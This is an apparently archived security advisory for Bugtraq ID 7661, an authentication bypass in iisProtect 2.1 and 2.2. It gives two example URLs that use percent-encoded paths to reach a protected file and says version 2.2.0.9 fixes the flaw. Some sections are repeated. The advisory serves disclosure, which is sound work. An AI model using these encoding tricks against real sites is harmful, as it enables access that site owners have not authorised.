IISProtect Authentication Bypass Vulnerability
BID:7661
Info
IISProtect Authentication Bypass Vulnerability
| Bugtraq ID: | 7661 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 22 2003 12:00AM |
| Updated: | May 22 2003 12:00AM |
| Credit: | This issue was reported by iDEFENSE. |
| Vulnerable: |
iisProtect iisProtect 2.2 iisProtect iisProtect 2.1 |
| Not Vulnerable: |
iisProtect iisProtect 2.2 .0.9 |
Exploit / POC
IISProtect Authentication Bypass Vulnerability
This issue can be exploited with a web browser. The following examples were provided:
http://www.example.com/%70rotected/secret.html
http://www.example.com/protected%2fsecret.html
This issue can be exploited with a web browser. The following examples were provided:
http://www.example.com/%70rotected/secret.html
http://www.example.com/protected%2fsecret.html
Solution / Fix
IISProtect Authentication Bypass Vulnerability
Solution:
This issue has been addressed in iisProtect version 2.2.0.9. Users should contact the vendor for details on obtaining upgrades.
Solution:
This issue has been addressed in iisProtect version 2.2.0.9. Users should contact the vendor for details on obtaining upgrades.
References
IISProtect Authentication Bypass Vulnerability
References:
References:
- Authentication Bypass in iisPROTECT (iDEFENSE)
- iisProtect Homepage (iisProtect)